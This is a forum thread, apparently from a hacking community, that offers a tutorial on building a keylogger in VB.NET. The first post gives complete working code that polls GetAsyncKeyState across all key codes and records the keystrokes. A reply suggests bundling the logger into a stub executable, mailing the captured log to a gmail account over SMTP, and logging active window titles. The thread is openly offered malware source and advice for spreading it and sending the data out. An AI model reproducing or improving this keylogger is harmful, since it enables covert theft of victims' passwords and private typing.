Results 1 to 5 of 5
  1. #1
    sigmahero's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Posts
    12
    Reputation
    10
    Thanks
    0

    {tut} How to make simple key logger

    Im going to show you how to make a very simple key logger

    Add the folowing to a form
    ____________________

    1.Timmer
    2.Text box(multi line) cover entir page with ith

    Step2.

    Make the timer enabeled and with intervels of 1

    step 3
    Select all code in the form deleate and copy and past this

    Public Class Form1
    Dim result As Integer
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer


    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    End Sub

    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
    For i = 1 To 255
    result = 0
    result = GetAsyncKeyState(i)
    If result = -32767 Then
    TextBox1.Text = TextBox1.Text + Chr(i)
    End If
    Next i

    End Sub
    End Class
    Now your finished

  2. #2
    Pixipixel_'s Avatar
    Join Date
    Oct 2009
    Gender
    male
    Location
    VCExpress.exe || France :D
    Posts
    2,087
    Reputation
    27
    Thanks
    742
    My Mood
    Cool
    It's better with a good Stub
    Code:
    FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
    & it send the rapport in your gmail
    Code:
    SMTP.Port = 587
            SMTP.EnableSsl = True
    If you want the vurrent window title it's
    Code:
    If title <> GetActiveWindowTitle() Then
    etc..

  3. #3
    sigmahero's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Posts
    12
    Reputation
    10
    Thanks
    0
    i know this is just a simple one

  4. #4
    XGelite's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    Enter text here
    Posts
    1,344
    Reputation
    12
    Thanks
    276
    now will have keyloggers everywhere! lol

  5. #5
    sora295's Avatar
    Join Date
    May 2009
    Gender
    male
    Location
    san diego
    Posts
    93
    Reputation
    10
    Thanks
    8
    My Mood
    Aggressive
    how am i suposed to use this?

Similar Threads

  1. [TUT]How to make a simple Auto Clicker!
    By Takari in forum Programming Tutorials
    Replies: 24
    Last Post: 09-20-2010, 07:28 PM
  2. [TUT]How to make a simple[Closed]
    By Takari in forum Visual Basic Programming
    Replies: 17
    Last Post: 04-22-2010, 10:49 AM
  3. [TUT]How to make a Simple Auto Clicker!
    By DeathHunter in forum CrossFire Hack Coding / Programming / Source Code
    Replies: 22
    Last Post: 04-15-2010, 12:30 PM
  4. *Tut* How To Make A Simple Notepad
    By u1111u in forum Programming Tutorials
    Replies: 2
    Last Post: 01-31-2010, 11:58 PM